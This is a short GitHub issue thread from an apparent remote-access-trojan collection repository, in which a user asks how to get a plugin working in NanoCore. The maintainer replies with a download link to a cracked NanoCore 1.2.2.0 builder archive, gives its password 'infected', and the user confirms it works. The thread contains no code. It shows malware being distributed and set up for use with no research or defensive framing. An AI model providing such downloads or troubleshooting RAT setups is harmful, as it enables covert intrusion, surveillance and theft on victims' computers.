### ISSUE TITLE
can upload the nano nana on nanocore?

### ISSUE THREAD

**Issue by Ghazouai** [Cryakl/Ultimate-RAT-Collection#17]
pls help asap

**Comment by Cryakl** [comment]
> oh wait, when i did add the plugin, it didnt work... ![nanonana](https://private-user-images.githubusercontent.com/146994677/368079395-44b1485e-89d5-4ab6-a944-5f0c02de2e87.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjY1NzE3NzIsIm5iZiI6MTcyNjU3MTQ3MiwicGF0aCI6Ii8xNDY5OTQ2NzcvMzY4MDc5Mzk1LTQ0YjE0ODVlLTg5ZDUtNGFiNi1hOTQ0LTVmMGMwMmRlMmU4Ny5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwOTE3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDkxN1QxMTExMTJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01NjA4NTM5NjZmMjA3MmRjYjVhZGNiZTY4Y2ZiZjk0ZmVjYjhjOTNiMDJmNDgzMDI5YzgxNTdiZjVhODczMzI5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.XVAlMEhja6imoUyXpHaZeyrcCQRgY2naKbAaM4X6gDc)

Hello, I figured out the issue. It's a different version of the tool I uploaded.  
Please try this new one and enable the plugins here:  

![Plug](https://github.com/user-attachments/assets/a620ae7d-dab6-4778-8567-9136df5e443a)

[NanoCore.1.2.2.0.Cracked.By.Alcatraz3222.zip](https://github.com/user-attachments/files/17027293/NanoCore.1.2.2.0.Cracked.By.Alcatraz3222.zip)

Password: infected

**Comment by Ghazouai** [comment]
ok i will try it.

**Comment by Ghazouai** [comment]
wow, it actually works.. tysm

**Comment by Cryakl** [comment]
> wow, it actually works.. tysm

No problem, sorry for the issues.
